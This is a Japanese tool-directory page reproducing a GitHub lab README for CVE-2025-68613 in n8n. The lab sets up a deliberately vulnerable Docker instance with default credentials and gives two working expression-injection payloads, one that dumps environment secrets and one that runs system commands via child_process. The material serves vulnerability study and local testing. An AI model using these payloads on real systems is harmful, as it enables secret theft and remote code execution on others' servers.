Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-68613-n8n-lab — CVE-2025-68613の分析 | Kitploit
ツール/GitHubGitHub/r4j3sh-com/cve-2025-68613-n8n-lab
脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ラボと実践
GitHubr4j3sh-com/cve-2025-68613-n8n-lab

CVE-2025-68613-n8n-lab

CVE-2025-68613の分析

リポジトリを見る
28ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-68613 ローカル n8n ラボ

このリポジトリは、CVE-2025-68613 をローカルでテストするための脆弱な n8n インスタンスを実行する、シンプルな Docker Compose セットアップを提供します。

要件

  • Docker Desktop または Docker Engine
  • Docker Compose v2

クイックスタート

  1. コンテナを起動します:

    root@kitploit:~
    docker compose up -d
    
  2. ブラウザで n8n を開きます:

    • http://localhost:5678
  3. docker-compose.yml で設定されているデフォルトの認証情報でログインします:

    • ユーザー名:admin
    • パスワード:password

停止とクリーンアップ

root@kitploit:~
docker compose down

免責事項と安全性

この環境はローカルでの隔離テスト専用です。このインスタンスをパブリックインターネットや信頼できないネットワークに公開しないでください。プライベートでローカルのみのネットワークセグメントに維持し、本番システムから分離してください。自己責任で使用してください。

ツールをダウンロード

脆弱性の検証(Proof of Concept)

コンテナが起動したら、http://localhost:5678 で n8n インターフェースにアクセスできます。脆弱性をテストするには、悪意のある JavaScript ペイロードを式フィールドに注入します。

再現手順:

  1. ログイン:ダッシュボードにアクセスします(ベーシック認証を設定した場合は、提供された認証情報を使用します。それ以外の場合は、新しいオーナーアカウントを作成します)。
  2. ワークフローを作成:「Add Workflow」をクリックするか、https://n8n.example.com/workflow/new に移動します。
  3. ノードを追加:「Set」ノードを追加します。
  4. ペイロードを注入:「Set」ノードの「Value」フィールドに、以下のペイロードのいずれかを入力します(可能な場合は「Expression」モードを切り替えるか、n8n が式として解釈する構文を貼り付けてください)。

テスト 1:環境変数の外部送信 このペイロードは、多くの場合シークレットを含むプロセス環境変数へのアクセスを試みます。

root@kitploit:~
{{ (function() { return this.process.env; })() }}

環境変数の外部送信

テスト 2:リモートコード実行(RCE) このペイロードは、child_process モジュールをロードしてシステムコマンド(例:whoami)を実行しようとします。

root@kitploit:~
{{ (function() {
    var require = this.process.mainModule.require;
    var execSync = require('child_process').execSync;
    return execSync('whoami').toString();
})() }}

id コマンドによる RCE の例

期待される結果:環境が脆弱な場合、「Set」ノードの「Output」パネルにコマンドの結果(例:root または n8n ユーザー)や、環境変数を含む JSON オブジェクトが表示されます。インスタンスがパッチ適用済みの場合(例:バージョン 1.122.0+)、サンドボックスは空のオブジェクトまたはエラーを返します。